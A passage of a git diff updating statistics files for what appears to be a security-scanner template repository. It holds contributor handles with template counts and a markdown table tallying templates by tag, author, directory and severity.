@yashanand155","count":3},{"name":"dudez","count":3},{"name":"skeltavik","count":3},{"name":"davidmckennirey","count":3},{"name":"johnjhacking","count":3},{"name":"coldfish","count":3},{"name":"vsh00t","count":3},{"name":"farish","count":3},{"name":"emenalf","count":3},{"name":"dr0pd34d","count":3},{"name":"shifacyclewala","count":3},{"name":"_generic_human_","count":3},{"name":"unstabl3","count":3},{"name":"z3bd","count":3},{"name":"jarijaas","count":3},{"name":"impramodsargar","count":3},{"name":"splint3r7","count":3},{"name":"j3ssie","count":3},{"name":"alifathi-h1","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"me9187","count":3},{"name":"sushantkamble","count":3},{"name":"matt galligan","count":3},{"name":"salts","count":3},{"name":"canberbamber","count":3},{"name":"ekrause","count":3},{"name":"swissky","count":3},{"name":"fxploit","count":3},{"name":"c4sper0","count":3},{"name":"mavericknerd","count":3},{"name":"0w4ys","count":3},{"name":"whoever","count":3},{"name":"flx","count":3},{"name":"cheesymoon","count":3},{"name":"randomrobbie","count":3},{"name":"lucasljm2001","count":3},{"name":"thomas_from_offensity","count":3},{"name":"atomiczsec","count":3},{"name":"fyoorer","count":3},{"name":"parth","count":3},{"name":"taielab","count":3},{"name":"huowuzhao","count":3},{"name":"true13","count":3},{"name":"bernardofsr","count":3},{"name":"ambassify","count":3},{"name":"aringo","count":3},{"name":"userdehghani","count":3},{"name":"e1a","count":3},{"name":"evergreencartoons","count":3},{"name":"vagnerd","count":3},{"name":"f1tz","count":3},{"name":"isacaya","count":3},{"name":"lark-lab","count":3},{"name":"arcc","count":3},{"name":"xianke","count":3},{"name":"badboycxcc","count":3},{"name":"binaryfigments","count":3},{"name":"ayadim","count":2},{"name":"paperpen","count":2},{"name":"bp0lr","count":2},{"name":"sbani","count":2},{"name":"c3l3si4n","count":2},{"name":"dogancanbakir","count":2},{"name":"bsysop","count":2},{"name":"nuk3s3c","count":2},{"name":"rafaelwdornelas","count":2},{"name":"streetofhackerr007","count":2},{"name":"d4vy","count":2},{"name":"0xsapra","count":2},{"name":"v0idc0de","count":2},{"name":"t3l3machus","count":2},{"name":"danielmofer","count":2},{"name":"kre80r","count":2},{"name":"florianmaak","count":2},{"name":"martincodes-de","count":2},{"name":"joeldeleep","count":2},{"name":"codexlynx","count":2},{"name":"mzack9999","count":2},{"name":"dheerajmadhukar","count":2},{"name":"convisoappsec","count":2},{"name":"bing0o","count":2},{"name":"amsda","count":2},{"name":"nvn1729","count":2},{"name":"herry","count":2},{"name":"luci","count":2},{"name":"z0ne","count":2},{"name":"christianpoeschl","count":2},{"name":"foulenzer","count":2},{"name":"0xelkomy","count":2},{"name":"shelled","count":2},{"name":"ajaysenr","count":2},{"name":"arliya","count":2},{"name":"supr4s","count":2},{"name":"koti2","count":2},{"name":"davidegirardi","count":2},{"name":"mohammedsaneem","count":2},{"name":"zy9ard3","count":2},{"name":"thardt-praetorian","count":2},{"name":"pxmme1337","count":2},{"name":"brenocss","count":2},{"name":"hackerarpan","count":2},{"name":"dbrwsky","count":2},{"name":"8arthur","count":2},{"name":"parzival","count":2},{"name":"pbuff07","count":2},{"name":"cckuakilong","count":2},{"name":"k11h-de","count":2},{"name":"socketz","count":2},{"name":"bmcel","count":2},{"name":"charles d.","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"korteke","count":2},{"name":"666asd","count":2},{"name":"brucelsone","count":2},{"name":"w4cky_","count":2},{"name":"clarkvoss","count":2},{"name":"0xrudra","count":2},{"name":"maximus decimus","count":2},{"name":"manas_harsh","count":2},{"name":"kishore-hariram","count":2},{"name":"kiblyn11","count":2},{"name":"randomdhiraj","count":2},{"name":"sinkettu","count":2},{"name":"sy3omda","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"n-thumann","count":2},{"name":"dahse89","count":2},{"name":"y4er","count":2},{"name":"g4l1t0","count":2},{"name":"danmcinerney","count":2},{"name":"moritz nentwig","count":2},{"name":"afaq","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"usdag","count":2},{"name":"myztique","count":2},{"name":"msegoviag","count":2},{"name":"notnotnotveg","count":2},{"name":"gevakun","count":2},{"name":"bananabr","count":2},{"name":"ree4pwn","count":2},{"name":"0xnirvana","count":2},{"name":"cocxanh","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"0xcrypto","count":2},{"name":"h0j3n","count":2},{"name":"raesene","count":2},{"name":"geekby","count":2},{"name":"mrharshvardhan","count":2},{"name":"redteambrasil","count":2},{"name":"ehsahil","count":2},{"name":"shankaracharya","count":2},{"name":"joshlarsen","count":2},{"name":"thezakman","count":2},{"name":"vavkamil","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"6mile","count":2},{"name":"sascha brendel","count":2},{"name":"zomsop82","count":2},{"name":"thevillagehacker","count":2},{"name":"udit_thakkur","count":2},{"name":"lotusdll","count":2},{"name":"supras","count":2},{"name":"joshua rogers","count":2},{"name":"liwermor","count":2},{"name":"wa1tf0rme","count":2},{"name":"gal nagli","count":2},{"name":"thabisocn","count":2},{"name":"hetroublemakr","count":2},{"name":"paradessia","count":2},{"name":"nkxxkn","count":2},{"name":"0xsmiley","count":2},{"name":"uomogrande","count":2},{"name":"lstatro","count":2},{"name":"ep1csage","count":2},{"name":"github.com/its0x08","count":2},{"name":"x1m_martijn","count":2},{"name":"luqman","count":1},{"name":"arall","count":1},{"name":"miryangjung","count":1},{"name":"aaronchen0","count":1},{"name":"soyelmago","count":1},{"name":"pratik khalane","count":1},{"name":"0xh7ml","count":1},{"name":"millermedia","count":1},{"name":"pepitoh","count":1},{"name":"hczdmr","count":1},{"name":"ilovebinbash","count":1},{"name":"guax1","count":1},{"name":"nagli","count":1},{"name":"yaser_s","count":1},{"name":"hotpot","count":1},{"name":"wabafet","count":1},{"name":"sshell","count":1},{"name":"h4kux","count":1},{"name":"retr02332","count":1},{"name":"ling","count":1},{"name":"high","count":1},{"name":"nytr0gen","count":1},{"name":"godfatherorwa","count":1},{"name":"toufik-airane","count":1},{"name":"jeya.seelan","count":1},{"name":"akshansh","count":1},{"name":"zinminphy0","count":1},{"name":"shivanshkhari","count":1},{"name":"revblock","count":1},{"name":"co0nan","count":1},{"name":"adnanekhan","count":1},{"name":"petruknisme","count":1},{"name":"vulnspace","count":1},{"name":"luqmaan hadia","count":1},{"name":"fpatrik","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"daviey","count":1},{"name":"kiransau","count":1},{"name":"failopen","count":1},{"name":"chron0x","count":1},{"name":"davidfegyver","count":1},{"name":"shiar","count":1},{"name":"manuelbua","count":1},{"name":"bjxsec","count":1},{"name":"prettyboyaaditya","count":1},{"name":"arjunchandarana","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"sherlocksecurity","count":1},{"name":"jfbes","count":1},{"name":"mhdsamx","count":1},{"name":"0xtavian","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"sickwell","count":1},{"name":"tirtha","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ipanda","count":1},{"name":"narluin","count":1},{"name":"hardik-rathod","count":1},{"name":"arr0way","count":1},{"name":"yashgoti","count":1},{"name":"hazana","count":1},{"name":"fopina","count":1},{"name":"tehtbl","count":1},{"name":"x6263","count":1},{"name":"juicypotato1","count":1},{"name":"therealtoastycat","count":1},{"name":"kurohost","count":1},{"name":"ransomsec","count":1},{"name":"dorkerdevil","count":1},{"name":"unp4ck","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"elder tao","count":1},{"name":"youngpope","count":1},{"name":"viniciuspereiras","count":1},{"name":"flag007","count":1},{"name":"majidmc2","count":1},{"name":"rumble773","count":1},{"name":"adrianmf","count":1},{"name":"lady_bug","count":1},{"name":"aayush vishnoi","count":1},{"name":"andirrahmani1","count":1},{"name":"elitebaz","count":1},{"name":"whynotke","count":1},{"name":"pjborah","count":1},{"name":"erethon","count":1},{"name":"freakyclown","count":1},{"name":"sttlr","count":1},{"name":"nobody","count":1},{"name":"af001","count":1},{"name":"mrcl0wnlab","count":1},{"name":"xcapri","count":1},{"name":"screamy","count":1},{"name":"jonathanwalker","count":1},{"name":"egemenkochisarli","count":1},{"name":"ruppde","count":1},{"name":"0xparth","count":1},{"name":"puben","count":1},{"name":"y0no","count":1},{"name":"geraldino2","count":1},{"name":"exid","count":1},{"name":"josecosta","count":1},{"name":"2rs3c","count":1},{"name":"yavolo","count":1},{"name":"ptonewreckin","count":1},{"name":"mantissts","count":1},{"name":"zandros0","count":1},{"name":"ldionmarcil","count":1},{"name":"liquidsec","count":1},{"name":"null_hypothesis","count":1},{"name":"alevsk","count":1},{"name":"compr00t","count":1},{"name":"phillipo","count":1},{"name":"miroslavsotak","count":1},{"name":"exploitation","count":1},{"name":"makyotox","count":1},{"name":"mariam tariq","count":1},{"name":"micha3lb3n","count":1},{"name":"chesterblue","count":1},{"name":"calumjelrick","count":1},{"name":"jcockhren","count":1},{"name":"pphuahua","count":1},{"name":"mubassirpatel","count":1},{"name":"invisiblethreat","count":1},{"name":"jbaines-r7","count":1},{"name":"duty_1g","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"barthy.koeln","count":1},{"name":"jiheon-dev","count":1},{"name":"wlayzz","count":1},{"name":"w0tx","count":1},{"name":"remonsec","count":1},{"name":"ok_bye_now","count":1},{"name":"piyushchhiroliya","count":1},{"name":"aaban solutions","count":1},{"name":"kiks7","count":1},{"name":"mbmy","count":1},{"name":"charanrayudu","count":1},{"name":"kresec","count":1},{"name":"aresx","count":1},{"name":"udyz","count":1},{"name":"secthebit","count":1},{"name":"mayank_pandey01","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"aron molnar","count":1},{"name":"ph33rr","count":1},{"name":"dk999","count":1},{"name":"b4uh0lz","count":1},{"name":"f1she3","count":1},{"name":"spac3wh1te","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"mabdullah22","count":1},{"name":"opencirt","count":1},{"name":"gboddin","count":1},{"name":"shivampand3y","count":1},{"name":"becivells","count":1},{"name":"_darrenmartyn","count":1},{"name":"imhunterand","count":1},{"name":"dabla","count":1},{"name":"pdp","count":1},{"name":"nielsing","count":1},{"name":"ayadi","count":1},{"name":"xshuden","count":1},{"name":"allenwest24","count":1},{"name":"hakimkt","count":1},{"name":"0xprial","count":1},{"name":"ofjaaah","count":1},{"name":"gonski","count":1},{"name":"kr1shna4garwal","count":1},{"name":"eremit4","count":1},{"name":"houdinis","count":1},{"name":"b0rn2r00t","count":1},{"name":"udinchan","count":1},{"name":"sanineng","count":1},{"name":"francescocarlucci","count":1},{"name":"bugvsme","count":1},{"name":"tea","count":1},{"name":"cravaterouge","count":1},{"name":"whotwagner","count":1},{"name":"archer","count":1},{"name":"kchason","count":1},{"name":"queencitycyber","count":1},{"name":"viondexd","count":1},{"name":"shifacyclewla","count":1},{"name":"berkdusunur","count":1},{"name":"d4ly","count":1},{"name":"open-sec","count":1},{"name":"joaonevess","count":1},{"name":"tangxiaofeng7","count":1},{"name":"thelicato","count":1},{"name":"evolutionsec","count":1},{"name":"jc175","count":1},{"name":"am0nt31r0","count":1},{"name":"apt-mirror","count":1},{"name":"j33n1k4","count":1},{"name":"sec_hawk","count":1},{"name":"danigoland","count":1},{"name":"shiva (strobes security)","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"galoget","count":1},{"name":"wpsec","count":1},{"name":"r3s ost","count":1},{"name":"kaizensecurity","count":1},{"name":"carrot2","count":1},{"name":"esonhugh","count":1},{"name":"ramkrishna sawant","count":1},{"name":"elouhi","count":1},{"name":"kagamigawa","count":1},{"name":"kailashbohara","count":1},{"name":"iphantasmic","count":1},{"name":"booboohq","count":1},{"name":"rivalsec","count":1},{"name":"exceed","count":1},{"name":"ohlinge","count":1},{"name":"djoevanka","count":1},{"name":"nerrorsec","count":1},{"name":"mordavid","count":1},{"name":"juliosmelo","count":1},{"name":"_c0wb0y_","count":1},{"name":"lbb","count":1},{"name":"topscoder","count":1},{"name":"dali","count":1},{"name":"patralos","count":1},{"name":"regala_","count":1},{"name":"noah @thesubtlety","count":1},{"name":"babybash","count":1},{"name":"fmunozs","count":1},{"name":"chetgan","count":1},{"name":"yiran","count":1},{"name":"paper-pen","count":1},{"name":"th3.d1p4k","count":1},{"name":"qianbenhyu","count":1},{"name":"michael wedl","count":1},{"name":"jacalynli","count":1},{"name":"oscarintherocks","count":1},{"name":"zsusac","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"mah3sec_","count":1},{"name":"borna nematzadeh","count":1},{"name":"sospiro","count":1},{"name":"d0rkerdevil","count":1},{"name":"olewagner","count":1},{"name":"couskito","count":1},{"name":"mayankpandey01","count":1},{"name":"aravind","count":1},{"name":"httpvoid","count":1},{"name":"anon-artist","count":1},{"name":"byobin","count":1},{"name":"jna1","count":1},{"name":"amirmsafari","count":1},{"name":"deena","count":1},{"name":"danfaizer","count":1},{"name":"ahmed abou-ela","count":1},{"name":"west-wise","count":1},{"name":"un-fmunozs","count":1},{"name":"mr.bobo hp","count":1},{"name":"daffianfo","count":1},{"name":"banana69","count":1},{"name":"_harleo","count":1},{"name":"evan rubinstien","count":1},{"name":"naglis","count":1},{"name":"k3rwin","count":1},{"name":"luskabol","count":1},{"name":"zn9988","count":1},{"name":"sicksec","count":1},{"name":"amanrawat","count":1},{"name":"affix","count":1},{"name":"hlop","count":1},{"name":"patrick pirker","count":1},{"name":"undefl0w","count":1},{"name":"pry0cc","count":1},{"name":"adilsoybali","count":1},{"name":"alex","count":1},{"name":"lark lab","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"izn0u","count":1},{"name":"win3zz","count":1},{"name":"lixts","count":1},{"name":"sak1","count":1},{"name":"ky9oss","count":1},{"name":"ramondunker","count":1},{"name":"erikowen","count":1},{"name":"luciannitescu","count":1},{"name":"husain","count":1},{"name":"sinsinology","count":1},{"name":"hanlaomo","count":1},{"name":"dmartyn","count":1},{"name":"pascalheidmann","count":1},{"name":"carson chan","count":1},{"name":"yuansec","count":1},{"name":"marcio mendes","count":1},{"name":"f0xy","count":1},{"name":"amnotacat","count":1},{"name":"cbadke","count":1},{"name":"jrolf","count":1},{"name":"8authur","count":1},{"name":"momen eldawakhly","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"zhenwarx","count":1},{"name":"0xceba","count":1},{"name":"numan türle","count":1},{"name":"fur1na","count":1},{"name":"jteles","count":1},{"name":"qlkwej","count":1},{"name":"yusakie","count":1},{"name":"ringo","count":1},{"name":"caon","count":1},{"name":"ap3r","count":1},{"name":"mukundbhuva","count":1},{"name":"0xcharan","count":1},{"name":"rschio","count":1},{"name":"intx0x80","count":1},{"name":"harshinsecurity","count":1},{"name":"floriandewald","count":1},{"name":"alexrydzak","count":1},{"name":"bughuntersurya","count":1},{"name":"bad5ect0r","count":1},{"name":"ynnirc","count":1},{"name":"jaskaran","count":1},{"name":"adamparsons","count":1},{"name":"0xceeb","count":1},{"name":"elmahdi","count":1},{"name":"manasmbellani","count":1},{"name":"pussycat0","count":1},{"name":"ola456","count":1},{"name":"christbowel","count":1},{"name":"myst7ic","count":1},{"name":"mihhailsokolov","count":1},{"name":"notwhy","count":1},{"name":"ledoubletake","count":1},{"name":"justmumu","count":1},{"name":"ooooooo_q","count":1},{"name":"zeyad azima","count":1},{"name":"mass0ma","count":1},{"name":"omarjezi","count":1},{"name":"philippdelteil","count":1},{"name":"furkansayim","count":1},{"name":"rodnt","count":1},{"name":"matt miller","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"s1r1us","count":1},{"name":"lamscun","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"vinit989","count":1},{"name":"bjhulst","count":1},{"name":"rotemreiss","count":1},{"name":"0ut0fb4nd","count":1},{"name":"realexp3rt","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thebinitghimire","count":1},{"name":"official_blackhat13","count":1},{"name":"lingtren","count":1},{"name":"xeldax","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"brianlam38","count":1},{"name":"watchtowr","count":1},{"name":"axrk","count":1},{"name":"igibanez","count":1},{"name":"noobexploiter","count":1},{"name":"iampritam","count":1},{"name":"aringo-bf","count":1},{"name":"0xd0ff9","count":1},{"name":"natto97","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"shockwave","count":1},{"name":"mchklt","count":1},{"name":"none","count":1},{"name":"shreyapohekar","count":1},{"name":"akash.c","count":1},{"name":"0xrod","count":1},{"name":"sdcampbell","count":1},{"name":"0xteles","count":1},{"name":"skylark-lab","count":1},{"name":"sorrowx3","count":1},{"name":"domenicoveneziano","count":1},{"name":"kabirsuda","count":1},{"name":"p-l-","count":1},{"name":"bywalks","count":1},{"name":"drfabiocastro","count":1},{"name":"b0yd","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"push4d","count":1},{"name":"marcos_iaf","count":1},{"name":"rubina119","count":1},{"name":"abbas.heybati","count":1},{"name":"act1on3","count":1},{"name":"petergrifin","count":1},{"name":"retr0","count":1},{"name":"notsoevilweasel","count":1},{"name":"th3r4id","count":1},{"name":"carlosvieira","count":1},{"name":"technicaljunkie","count":1},{"name":"andysvints","count":1},{"name":"denandz","count":1},{"name":"schniggie","count":1},{"name":"ahmetpergamum","count":1},{"name":"mammad_rahimzada","count":1},{"name":"dawid-czarnecki","count":1},{"name":"jeya seelan","count":1},{"name":"unblvr1","count":1},{"name":"nuts7","count":1},{"name":"rinolock","count":1},{"name":"harryha","count":1},{"name":"dievus","count":1},{"name":"orpheus","count":1},{"name":"hateshape","count":1},{"name":"amir-h-fallahi","count":1},{"name":"omarkurt","count":1},{"name":"bartu utku sarp","count":1},{"name":"jbertman","count":1},{"name":"pudsec","count":1},{"name":"breno_css","count":1},{"name":"colbyjack1134","count":1},{"name":"irshadahamed","count":1},{"name":"absshax","count":1},{"name":"m0ck3d","count":1},{"name":"vikas kundu","count":1},{"name":"lethargynavigator","count":1},{"name":"jub0bs","count":1},{"name":"hakluke","count":1},{"name":"knassar702","count":1},{"name":"ndmalc","count":1},{"name":"noamrathaus","count":1},{"name":"mlec","count":1},{"name":"miguelsegoviagil","count":1},{"name":"w8ay","count":1},{"name":"xc1ym","count":1},{"name":"rojanrijal","count":1},{"name":"mesaglio","count":1},{"name":"kareemse1im","count":1},{"name":"tim_koopmans","count":1},{"name":"furkansenan","count":1},{"name":"unknown","count":1},{"name":"droberson","count":1},{"name":"alperenkesk","count":1},{"name":"fq_hsu","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"xstp","count":1},{"name":"savik","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"thirukrishnan","count":1},{"name":"5up3r541y4n","count":1},{"name":"yashanand155","count":1},{"name":"stupidfish","count":1},{"name":"tirtha_mandal","count":1},{"name":"r3nz0","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"smaranchand","count":1},{"name":"lrtk-coder","count":1},{"name":"0xkayala","count":1},{"name":"vzamanillo","count":1},{"name":"brabbit10","count":1},{"name":"gpiechnik2","count":1},{"name":"michal-mikolas","count":1},{"name":"hexcat","count":1},{"name":"hyunsoo-ds","count":1},{"name":"metascan","count":1},{"name":"ahmed sherif","count":1},{"name":"osamahamad","count":1},{"name":"infosecsanyam","count":1},{"name":"palanichamy_perumal","count":1},{"name":"dwbzn","count":1},{"name":"shelld3v","count":1},{"name":"1nf1n7y","count":1},{"name":"clment cruchet","count":1},{"name":"blckraven","count":1},{"name":"akokonunes","count":1},{"name":"jas37","count":1},{"name":"phyr3wall","count":1},{"name":"willd96","count":1},{"name":"arqsz","count":1},{"name":"dale clarke","count":1},{"name":"unkl4b","count":1},{"name":"h4sh5","count":1},{"name":"professorabhay","count":1},{"name":"pwnwithlove","count":1},{"name":"0h1in9e","count":1},{"name":"higor melgaço","count":1},{"name":"jaimin gondaliya","count":1},{"name":"s1r1u5_","count":1},{"name":"rotembar","count":1}],"directory":[{"name":"http","count":7417},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":138},{"name":"cloud","count":98},{"name":"code","count":81},{"name":"javascript","count":56},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":11},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1}],"severity":[{"name":"info","count":3657},{"name":"high","count":1703},{"name":"medium","count":1517},{"name":"critical","count":1029},{"name":"low","count":265},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 2d64f7060a..6ddbad3911 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,5348 +1,5384 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2435 | dhiyaneshdk | 1262 | http | 7355 | info | 3645 | file | 337 | -| panel | 1123 | daffainfo | 864 | file | 337 | high | 1686 | dns | 25 | -| wordpress | 962 | dwisiswant0 | 803 | workflows | 191 | medium | 1503 | | | -| exposure | 901 | pikpikcu | 353 | network | 136 | critical | 1009 | | | -| xss | 895 | pussycat0x | 349 | cloud | 98 | low | 265 | | | -| wp-plugin | 837 | ritikchaddha | 326 | code | 81 | unknown | 38 | | | +| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 | +| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 | +| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | | +| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | | +| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | | +| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | | | osint | 804 | pdteam | 297 | javascript | 56 | | | | | -| tech | 674 | princechaddha | 260 | ssl | 29 | | | | | -| lfi | 647 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 602 | geeknik | 230 | dast | 21 | | | | | +| tech | 674 | princechaddha | 268 | ssl | 29 | | | | | +| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 606 | geeknik | 230 | dast | 21 | | | | | | edb | 599 | theamanrawat | 223 | headless | 11 | | | | | -| rce | 586 | r3y3r53 | 200 | contributors.json | 1 | | | | | -| packetstorm | 528 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | -| cve2021 | 491 | gy741 | 158 | cves.json | 1 | | | | | -| wpscan | 487 | rxerium | 139 | | | | | | | +| rce | 591 | r3y3r53 | 200 | contributors.json | 1 | | | | | +| packetstorm | 530 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | +| wpscan | 495 | gy741 | 158 | cves.json | 1 | | | | | +| cve2021 | 491 | rxerium | 141 | | | | | | | | cve2022 | 476 | sleepingbag945 | 132 | | | | | | | -| wp | 411 | righettod | 126 | | | | | | | -| unauth | 361 | arafatansari | 119 | | | | | | | -| cve2023 | 347 | tess | 109 | | | | | | | -| file | 346 | pdresearch | 76 | | | | | | | -| sqli | 344 | madrobot | 65 | | | | | | | -| authenticated | 341 | idealphase | 64 | | | | | | | -| intrusive | 297 | zzeitlin | 64 | | | | | | | -| kev | 271 | iamnoooob | 63 | | | | | | | -| cve2020 | 257 | akincibor | 59 | | | | | | | -| login | 250 | rootxharsh | 56 | | | | | | | -| detect | 249 | for3stco1d | 55 | | | | | | | -| token-spray | 243 | philippedelteil | 52 | | | | | | | +| wp | 419 | righettod | 131 | | | | | | | +| cve2023 | 364 | arafatansari | 118 | | | | | | | +| unauth | 363 | tess | 109 | | | | | | | +| sqli | 352 | pdresearch | 81 | | | | | | | +| file | 346 | iamnoooob | 68 | | | | | | | +| authenticated | 342 | madrobot | 65 | | | | | | | +| intrusive | 299 | idealphase | 65 | | | | | | | +| kev | 268 | zzeitlin | 64 | | | | | | | +| login | 259 | rootxharsh | 61 | | | | | | | +| detect | 259 | akincibor | 59 | | | | | | | +| cve2020 | 257 | for3stco1d | 55 | | | | | | | +| token-spray | 243 | philippedelteil | 53 | | | | | | | +| oast | 221 | edoardottt | 42 | | | | | | | | config | 220 | gaurang | 42 | | | | | | | -| oast | 219 | edoardottt | 41 | | | | | | | | top-200 | 215 | johnk3r | 40 | | | | | | | +| default-login | 211 | j4vaovo | 35 | | | | | | | | osint-social | 210 | c-sh0 | 35 | | | | | | | -| default-login | 209 | j4vaovo | 35 | | | | | | | -| token | 193 | adam crosser | 31 | | | | | | | -| network | 191 | luisfelipe146 | 31 | | | | | | | -| | 191 | ice3man | 28 | | | | | | | -| apache | 188 | pwnhxl | 28 | | | | | | | -| devops | 176 | hardik-solanki | 24 | | | | | | | -| cve2018 | 169 | organiccrap | 24 | | | | | | | -| iot | 166 | techbrunchfr | 23 | | | | | | | -| cve2019 | 164 | ctflearner | 23 | | | | | | | -| keys | 155 | harsh | 23 | | | | | | | -| joomla | 148 | ffffffff0x | 22 | | | | | | | -| malware | 142 | mastercho | 22 | | | | | | | -| redirect | 134 | parthmalhotra | 20 | | | | | | | -| aws | 133 | cckuailong | 18 | | | | | | | -| cloud | 132 | sullo | 18 | | | | | | | -| auth-bypass | 127 | 0xpugazh | 16 | | | | | | | -| ssrf | 118 | shaikhyaser | 16 | | | | | | | +| network | 194 | adam crosser | 31 | | | | | | | +| token | 193 | luisfelipe146 | 31 | | | | | | | +| | 191 | mastercho | 29 | | | | | | | +| apache | 188 | ice3man | 29 | | | | | | | +| devops | 176 | pwnhxl | 28 | | | | | | | +| cve2018 | 169 | hardik-solanki | 24 | | | | | | | +| iot | 166 | organiccrap | 24 | | | | | | | +| cve2019 | 165 | techbrunchfr | 23 | | | | | | | +| keys | 155 | ctflearner | 23 | | | | | | | +| joomla | 148 | harsh | 23 | | | | | | | +| malware | 142 | ffffffff0x | 22 | | | | | | | +| redirect | 135 | parthmalhotra | 20 | | | | | | | +| aws | 133 | sullo | 18 | | | | | | | +| cloud | 132 | cckuailong | 18 | | | | | | | +| auth-bypass | 129 | 0xpugazh | 16 | | | | | | | +| ssrf | 119 | shaikhyaser | 16 | | | | | | | | phishing | 117 | random-robbie | 16 | | | | | | | | amazon | 116 | lu4nx | 16 | | | | | | | -| files | 113 | pr3r00t | 15 | | | | | | | -| cve2010 | 112 | sheikhrishad | 15 | | | | | | | -| cve2017 | 110 | unapibageek | 15 | | | | | | | -| router | 108 | bhutch | 14 | | | | | | | -| cms | 108 | milo2012 | 14 | | | | | | | -| install | 106 | tenbird | 14 | | | | | | | -| top-100 | 100 | r3dg33k | 14 | | | | | | | -| aws-cloud-config | 89 | dogasantos | 14 | | | | | | | -| disclosure | 88 | nullfuzz | 13 | | | | | | | -| linux | 83 | sharath | 13 | | | | | | | -| code | 81 | elsfa7110 | 13 | | | | | | | -| local | 80 | melbadry9 | 13 | | | | | | | -| seclists | 79 | theabhinavgaur | 13 | | | | | | | -| privesc | 79 | 0ri2n | 13 | | | | | | | -| takeover | 78 | meme-lord | 12 | | | | | | | -| tokens | 78 | kazet | 12 | | | | | | | -| fileupload | 76 | suman_kar | 12 | | | | | | | -| oracle | 70 | wdahlenb | 11 | | | | | | | +| files | 113 | sheikhrishad | 15 | | | | | | | +| cve2010 | 112 | unapibageek | 15 | | | | | | | +| cms | 110 | bhutch | 15 | | | | | | | +| cve2017 | 110 | pr3r00t | 15 | | | | | | | +| router | 108 | milo2012 | 14 | | | | | | | +| install | 107 | kazgangap | 14 | | | | | | | +| top-100 | 100 | dogasantos | 14 | | | | | | | +| disclosure | 89 | r3dg33k | 14 | | | | | | | +| aws-cloud-config | 89 | tenbird | 14 | | | | | | | +| linux | 83 | melbadry9 | 13 | | | | | | | +| code | 81 | 0ri2n | 13 | | | | | | | +| local | 80 | theabhinavgaur | 13 | | | | | | | +| takeover | 79 | sharath | 13 | | | | | | | +| seclists | 79 | nullfuzz | 13 | | | | | | | +| privesc | 79 | elsfa7110 | 13 | | | | | | | +| tokens | 78 | suman_kar | 12 | | | | | | | +| fileupload | 76 | kazet | 12 | | | | | | | +| oracle | 70 | meme-lord | 12 | | | | | | | | oss | 67 | cyllective | 11 | | | | | | | -| cisco | 66 | logicalhunter | 10 | | | | | | | -| js | 62 | co5mos | 10 | | | | | | | -| adobe | 62 | 0x240x23elu | 10 | | | | | | | -| ir | 61 | alph4byt3 | 10 | | | | | | | -| huntr | 59 | random_robbie | 10 | | | | | | | -| cve2015 | 58 | nadino | 10 | | | | | | | -| cve2016 | 57 | hackergautam | 10 | | | | | | | -| atlassian | 57 | adamcrosser | 9 | | | | | | | -| google | 56 | initstring | 9 | | | | | | | -| vmware | 56 | oppsec | 9 | | | | | | | -| enum | 55 | fabaff | 9 | | | | | | | -| c2 | 55 | olearycrew | 9 | | | | | | | -| tenable | 48 | emadshanab | 9 | | | | | | | -| logs | 48 | momika233 | 9 | | | | | | | -| log4j | 47 | that_juan_ | 8 | | | | | | | -| hackerone | 46 | veshraj | 8 | | | | | | | -| vulhub | 46 | noraj | 8 | | | | | | | -| aem | 45 | iamthefrogy | 8 | | | | | | | -| osint-gaming | 45 | zh | 8 | | | | | | | -| cve2014 | 44 | aashiq | 8 | | | | | | | -| jndi | 44 | irshad ahamed | 8 | | | | | | | -| debug | 44 | _0xf4n9x_ | 8 | | | | | | | -| php | 44 | leovalcante | 7 | | | | | | | +| cisco | 66 | wdahlenb | 11 | | | | | | | +| cve2024 | 63 | 0x240x23elu | 10 | | | | | | | +| js | 62 | nadino | 10 | | | | | | | +| 